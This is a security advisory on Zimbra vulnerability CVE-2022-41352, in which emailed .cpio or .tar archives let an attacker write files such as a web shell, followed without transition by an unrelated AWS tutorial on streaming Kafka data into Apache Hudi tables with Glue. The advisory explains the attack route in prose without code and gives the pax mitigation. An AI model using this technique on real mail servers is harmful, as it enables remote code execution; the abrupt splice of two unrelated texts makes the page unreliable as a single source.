Note: This vulnerability, CVE-2022-41352 is effectively identical to CVE-2022-30333 but leverages a different file format (.cpio and .tar as opposed to .rar). It is also a byproduct of a much older (unfixed) vulnerability, CVE-2015-1197. While the original CVE-2015-1197 affects most major Linux distros, our research team found that it is not exploitable unless a secondary application – such as Zimbra, in this case – uses cpio to extract untrusted archives; therefore, this blog is only focusing on Zimbra CVE-2022-41352.

Rapid7 has published technical documentation, including proof-of-concept (PoC) and indicator-of-compromise (IoC) information, regarding CVE-2022-41352 on AttackerKB.

Background

To exploit this vulnerability, an attacker would email a .cpio, .tar, or .rpm to an affected server. When Amavis inspects it for malware, it uses cpio to extract the file. Since cpio has no mode where it can be securely used on untrusted files, the attacker can write to any path on the filesystem that the Zimbra user can access. The most likely outcome is for the attacker to plant a shell in the web root to gain remote code execution, although other avenues likely exist.

As of October 6, 2022, CVE-2022-41352 is not patched, but Zimbra has acknowledged the risk of relying on cpio in a blog post where they recommend mitigations. CVE-2022-41352 was discovered in the wild due to active exploitation. Recently, CISA and others have warned of multiple threat actors leveraging other vulnerabilities in Zimbra, which makes it likely that threat actors would logically move to exploit this latest unpatched vulnerability, too. In August, Rapid7 reported on the active exploitation of multiple vulnerabilities in Zimbra Collaboration Suite.

Affected products

Please note that information on affected versions or requirements for exploitability may change as we learn more about the threat.

To be exploitable, two conditions must exist:

  1. A vulnerable version of cpio must be installed, which is the case on basically every system (see CVE-2015-1197)
  2. The pax utility must not be installed, as Amavis prefers pax and pax is not vulnerable

Unfortunately, pax is not installed by default on Red Hat-based distros, and therefore they are vulnerable by default. We tested all (current) Linux distros that Zimbra officially supports in their default configurations and determined the following:

Linux Distro Vulnerable?
Oracle Linux 8 Vulnerable
Red Hat Enterprise Linux 8 Vulnerable
Rocky Linux 8 Vulnerable
CentOS 8 Vulnerable
Ubuntu 20.04 Not vulnerable (pax is installed by default)
Ubuntu 18.04 Not vulnerable (pax is installed, cpio has Ubuntu’s custom patch)

Zimbra says that their plan is to remove the dependency on cpio entirely by making pax a prerequisite for Zimbra Collaboration Suite. Moving to pax is the best option since cpio cannot be used securely (because most major operating systems removed a security patch).

Mitigation

Organizations that use an impacted version of Zimbra Collaboration Suite should apply their recommended workaround, which is to install the pax archive utility, then restart Zimbra or reboot while monitoring for further software updates from Zimbra.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2022-41352 via an authenticated vulnerability check (supported by Agent- and Scanner-based assessments) expected to be available in the October 6 content release. This check will identify systems with an affected version of Zimbra Collaboration Suite installed where the pax package is not available.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Ingest streaming data to Apache Hudi tables using AWS Glue and Apache Hudi DeltaStreamer

Post Syndicated from Vishal Pathak original https://aws.amazon.com/blogs/big-data/ingest-streaming-data-to-apache-hudi-tables-using-aws-glue-and-apache-hudi-deltastreamer/

In today’s world with technology modernization, the need for near-real-time streaming use cases has increased exponentially. Many customers are continuously consuming data from different sources, including databases, applications, IoT devices, and sensors. Organizations may need to ingest that streaming data into data lakes built on Amazon Simple Storage Service (Amazon S3). You may also need to achieve analytics and machine learning (ML) use cases in near-real time. To ensure consistent results in those near-real-time streaming use cases, incremental data ingestion and atomicity, consistency, isolation, and durability (ACID) properties on data lakes have been a common ask.

To address such use cases, one approach is to use Apache Hudi and its DeltaStreamer utility. Apache Hudi is an open-source data management framework designed for data lakes. It simplifies incremental data processing by enabling ACID transactions and record-level inserts, updates, and deletes of streaming ingestion on data lakes built on top of Amazon S3. Hudi is integrated with well-known open-source big data analytics frameworks, such as Apache Spark, Apache Hive, Presto, and Trino, as well as with various AWS analytics services like AWS Glue, Amazon EMR, Amazon Athena, and Amazon Redshift. The DeltaStreamer utility provides an easy way to ingest streaming data from sources like Apache Kafka into your data lake.

This post describes how to run the DeltaStreamer utility on AWS Glue to read streaming data from Amazon Managed Streaming for Apache Kafka (Amazon MSK) and ingest the data into S3 data lakes. AWS Glue is a serverless data integration service that makes it easy to discover, prepare, and combine data for analytics, ML, and application development. With AWS Glue, you can create Spark, Spark Streaming, and Python shell jobs to extract, transform, and load (ETL) data. You can create AWS Glue Spark streaming ETL jobs using either Scala or PySpark that run continuously, consuming data from Amazon MSK, Apache Kafka, and Amazon Kinesis Data Streams and writing it to your target.

Solution overview

To demonstrate the DeltaStreamer utility, we use fictional product data that represents product inventory including product name, category, quantity, and last updated timestamp. Let’s assume we stream the data from data sources to an MSK topic. Now we want to ingest this data coming from the MSK topic into Amazon S3 so that we can run Athena queries to analyze business trends in near-real time.

The following diagram provides the overall architecture of the solution described in this post.

To simulate application traffic, we use Amazon Elastic Compute Cloud (Amazon EC2) to send sample data to an MSK topic. Amazon MSK is a fully managed service that makes it easy to build and run applications that use Apache Kakfa to process streaming data. To consume the streaming data from Amazon MSK, we set up an AWS Glue streaming ETL job that uses the Apache Hudi Connector 0.10.1 for AWS Glue 3.0, with the DeltaStreamer utility to write the ingested data to Amazon S3. The Apache Hudi Connector 0.9.0 for AWS Glue 3.0 also supports the DeltaStreamer utility.

As the data is being ingested, the AWS Glue streaming job writes the data into the Amazon S3 base path. The data in Amazon S3 is cataloged using the AWS Glue Data Catalog. We then use Athena, which is an interactive query service, to query and analyze the data using standard SQL.

Prerequisites

We use an AWS CloudFormation template to provision some resources for our solution. The template requires you to select an EC2 key pair. This key is configured on an EC2 instance that lives in the public subnet. We use this EC2 instance to ingest data to the MSK cluster running in a private subnet. Make sure you have a key in the AWS Region where you deploy the template. If you don’t have one, you can create a new key pair.

Create the Apache Hudi connection

To add the Apache Hudi Connector for AWS Glue, complete the following steps:

  1. On the AWS Glue Studio console, choose Connectors.
  2. Choose Go to AWS Marketplace.
  3. Search for and choose Apache Hudi Connector for AWS Glue.
  4. Choose Continue to Subscribe.
  5. Review the terms and conditions, then choose Accept Terms.

    After you accept the terms, it takes some time to process the request.
    When the subscription is complete, you see the Effective date populated next to the product.
  6. Choose Continue to Configuration.
  7. For Fulfillment option, choose Glue 3.0.
  8. For Software version, choose 0.10.1.
  9. Choose Continue to Launch.
  10. Choose Usage instructions, and then choose Activate the Glue connector from AWS Glue Studio.

    You’re redirected to AWS Glue Studio.
  11. For Name, enter Hudi-Glue-Connector.
  12. Choose Create connection and activate connector.

A message appears that the connection was successfully created. Verify that the connection is visible on the AWS Glue Studio console.

Launch the CloudFormation stack

For this post, we provide a CloudFormation template to create the following resources:

  • VPC, subnets, security groups, and VPC endpoints
  • AWS Identity and Access Management (IAM) roles and policies with required permissions
  • An EC2 instance running in a public subnet within the VPC with Kafka 2.12 installed and with the source data initial load and source data incremental load JSON files
  • An Amazon MSK server running in a private subnet within the VPC
  • An AWS Glue Streaming DeltaStreamer job to consume the incoming data from the Kafka topic and write it to Amazon S3
  • Two S3 buckets: one of the buckets stores code and config files, and other is the target for the AWS Glue streaming DeltaStreamer job

To create the resources, complete the following steps:

  1. Choose Launch Stack:
  2. For Stack name, enter hudi-deltastreamer-glue-blog.
  3. For ClientIPCIDR, enter the IP address of your client that you use to connect to the EC2 instance.
  4. For HudiConnectionName, enter the AWS Glue connection you created earlier (Hudi-Glue-Connector).
  5. For KeyName, choose the name of the EC2 key pair that you created as a prerequisite.
  6. For VpcCIDR, leave as is.
  7. Choose Next.
  8. Choose Next.
  9. On the Review page, select I acknowledge that AWS CloudFormation might create IAM resources with custom names.
  10. Choose Create stack.

After the CloudFormation template is complete and the resources are created, the Outputs tab shows the following information:

  • HudiDeltastreamerGlueJob – The AWS Glue streaming job name
  • MSKCluster – The MSK cluster ARN
  • PublicIPOfEC2InstanceForTunnel – The public IP of the EC2 instance for tunnel
  • TargetS3Bucket – The S3 bucket name

Create a topic in the MSK cluster

Next, SSH to Amazon EC2 using the key pair you created and run the following commands:

  1. SSH to the EC2 instance as ec2-user:
    ssh -i <KeyName> ec2-user@<PublicIPOfEC2InstanceForTunnel>

    You can get the KeyName value on the Parameters tab and the public IP of the EC2 instance for tunnel on the Outputs tab of the CloudFormation stack.

  2. For the next command, retrieve the bootstrap server endpoint of the MSK cluster by navigating to msk-source-cluster on the Amazon MSK console and choosing View client information.
  3. Run the following command to create the topic in the MSK cluster hudi-deltastream-demo:
    ./kafka_2.12-2.6.2/bin/kafka-topics.sh --create \
    --topic hudi-deltastream-demo \
    --bootstrap-server "<replace text with value under private endpoint on MSK>" \
    --partitions 1 \
    --replication-factor 2 \
    --command-config ./config_file.txt

  4. Ingest the initial data from the deltastreamer_initial_load.json file into the Kafka topic:
    ./kafka_2.12-2.6.2/bin/kafka-console-producer.sh \
    --broker-list "<replace text with value under private endpoint on MSK>" \
    --topic hudi-deltastream-demo \
    --producer.config ./config_file.txt < deltastreamer_initial_load.json

The following is the schema of a record ingested into the Kafka topic:

{
  "type":"record",
  "name":"products",
  "fields":[{
     "name": "id",
     "type": "int"
  }, {
     "name": "category",
     "type": "string"
  }, {
     "name": "ts",
     "type": "string"
  },{
     "name": "name",
     "type": "string"
  },{
     "name": "quantity",
     "type": "int"
  }
]}

The schema uses the following parameters:

  • id – The product ID
  • category – The product category
  • ts – The timestamp when the record was inserted or last updated
  • name – The product name
  • quantity – The available quantity of the product in the inventory

The following code gives an example of a record:

{
    "id": 1, 
    "category": "Apparel", 
    "ts": "2022-01-02 10:29:00", 
    "name": "ABC shirt", 
    "quantity": 4
}

Start the AWS Glue streaming job

To start the AWS Glue streaming job, complete the following steps:

  1. On the AWS Glue Studio console, find the job with the value for HudiDeltastreamerGlueJob.
  2. Choose the job to review the script and job details.
  3. On the Job details tab, replace the value of the --KAFKA_BOOTSTRAP_SERVERS key with the Amazon MSK bootstrap server’s private endpoint.
  4. Choose Save to save the job settings.
  5. Choose Run to start the job.

When the AWS Glue streaming job runs, the records from the MSK topic are consumed and written to the target S3 bucket created by AWS CloudFormation. To find the bucket name, check the stack’s Outputs tab for the TargetS3Bucket key value.

The data in Amazon S3 is stored in Parquet file format. In this example, the data written to Amazon S3 isn’t partitioned, but you can enable partitioning by specifying hoodie.datasource.write.partitionpath.field=<column_name> as the partition field and setting hoodie.datasource.write.hive_style_partitioning to True in the Hudi configuration property in the AWS Glue job script.

In this post, we write the data to a non-partitioned table, so we set the following two Hudi configurations:

  • hoodie.datasource.hive_sync.partition_extractor_class is set to org.apache.hudi.hive.NonPartitionedExtractor
  • hoodie.datasource.write.keygenerator.class is set to org.apache.hudi.keygen.NonpartitionedKeyGenerator

DeltaStreamer options and configuration

DeltaStreamer has multiple options available; the following are the options set in the AWS Glue streaming job used in this post:

  • continuous – DeltaStreamer runs in continuous mode running source-fetch.
  • enable-hive-sync – Enables table sync to the Apache Hive Metastore.
  • schemaprovider-class – Defines the class for the schema provider to attach schemas to the input and target table data.
  • source-class – Defines the source class to read data and has many built-in options.
  • source-ordering-field – The field used to break ties between records with the same key in input data. Defaults to ts (the Unix timestamp of record).
  • target-base-path – Defines the path for the target Hudi table.
  • table-type – Indicates the Hudi storage type to use. In this post, it’s set to COPY_ON_WRITE.

The following are some of the important DeltaStreamer configuration properties set in the AWS Glue streaming job:

# Schema provider props (change to absolute path based on your installation)
hoodie.deltastreamer.schemaprovider.source.schema.file=s3://" + args("CONFIG_BUCKET") + "/artifacts/hudi-deltastreamer-glue/config/schema.avsc
hoodie.deltastreamer.schemaprovider.target.schema.file=s3://" + args("CONFIG_BUCKET") + "/artifacts/hudi-deltastreamer-glue/config/schema.avsc

# Kafka Source
hoodie.deltastreamer.source.kafka.topic=hudi-deltastream-demo

#Kafka props
bootstrap.servers=args("KAFKA_BOOTSTRAP_SERVERS")
auto.offset.reset=earliest
security.protocol=SSL

The configuration contains the following details:

  • hoodie.deltastreamer.schemaprovider.source.schema.file – The schema of the source record
  • hoodie.deltastreamer.schemaprovider.target.schema.file – The schema for the target record.
  • hoodie.deltastreamer.source.kafka.topic – The source MSK topic name
  • bootstap.servers – The Amazon MSK bootstrap server’s private endpoint
  • auto.offset.reset – The consumer’s behavior when there is no committed position or when an offset is out of range

Hudi configuration

The following are some of the important Hudi configuration options, which enable us to achieve in-place updates for the generated schema:

  • hoodie.datasource.write.recordkey.field – The record key field. This is the unique identifier of a record in Hudi.
  • hoodie.datasource.write.precombine.field – When two records have the same record key value, Apache Hudi picks the one with the largest value for the pre-combined field.
  • hoodie.datasource.write.operation – The operation on the Hudi dataset. Possible values include UPSERT, INSERT, and BULK_INSERT.

AWS Glue Data Catalog table

The AWS Glue job creates a Hudi table in the Data Catalog mapped to the Hudi dataset on Amazon S3. Because the hoodie.datasource.hive_sync.table configuration parameter is set to product_table, the table is visible under the default database in the Data Catalog.

The following screenshot shows the Hudi table column names in the Data Catalog.

Query the data using Athena

With the Hudi datasets available in Amazon S3, you can query the data using Athena. Let’s use the following query:

SELECT * FROM "default"."product_table";

The following screenshot shows the query output. The table product_table has four records from the initial ingestion: two records for the category Apparel, one for Cosmetics, and one for Footwear.

Load incremental data into the Kafka topic

Now suppose that the store sold some quantity of apparel and footwear and added a new product to its inventory, as shown in the following code. The store sold two items of product ID 1 (Apparel) and one item of product ID 3 (Footwear). The store also added the Cosmetics category, with product ID 5.

{"id": 1, "category": "Apparel", "ts": "2022-01-02 10:45:00", "name": "ABC shirt", "quantity": 2}
{"id": 3, "category": "Footwear", "ts": "2022-01-02 10:50:00", "name": "DEF shoes", "quantity": 5}
{"id": 5, "category": "Cosmetics", "ts": "2022-01-02 10:55:00", "name": "JKL Lip gloss", "quantity": 7}

Let’s ingest the incremental data from the deltastreamer_incr_load.json file to the Kafka topic and query the data from Athena:

./kafka_2.12-2.6.2/bin/kafka-console-producer.sh \
--broker-list "<replace text with value under private endpoint on MSK>" \
--topic hudi-deltastream-demo \
--producer.config ./config_file.txt < deltastreamer_incr_load.json

Within a few seconds, you should see a new Parquet file created in the target S3 bucket under the product_table prefix. The following is the screenshot from Athena after the incremental data ingestion showing the latest updates.

Additional considerations

There are some hard-coded Hudi options in the AWS Glue Streaming job scripts. These options are set for the sample table that we created for this post, so update the options based on your workload.

Clean up

To avoid any incurring future charges, delete the CloudFormation stack, which deletes all the underlying resources created by this post, except for the product_table table created in the default database. Manually delete the product_table table under the default database from the Data Catalog.

Conclusion

In this post, we illustrated how you can add the Apache Hudi Connector for AWS Glue and perform streaming ingestion into an S3 data lake using Apache Hudi DeltaStreamer with AWS Glue. You can use the Apache Hudi Connector for AWS Glue to create a serverless streaming pipeline using AWS Glue streaming jobs with the DeltaStreamer utility to ingest data from Kafka. We demonstrated this by reading the latest updated data using Athena in near-real time.

As always, AWS welcomes feedback. If you have any comments or questions on this post, please share them in the comments.


About the authors

Vishal Pathak is a Data Lab Solutions Architect at AWS. Vishal works with customers on their use cases, architects solutions to solve their business problems, and helps them build scalable prototypes. Prior to his journey in AWS, Vishal helped customers implement business intelligence, data warehouse, and data lake projects in the US and Australia.

Noritaka Sekiyama is a Principal Big Data Architect on the AWS Glue team. He enjoys learning different use cases from customers and sharing knowledge about big data technologies with the wider community.

Anand Prakash is a Senior Solutions Architect at AWS Data Lab. Anand focuses on helping customers design and build AI/ML, data analytics, and database solutions to accelerate their path to production.

The collective thoughts of the interwebz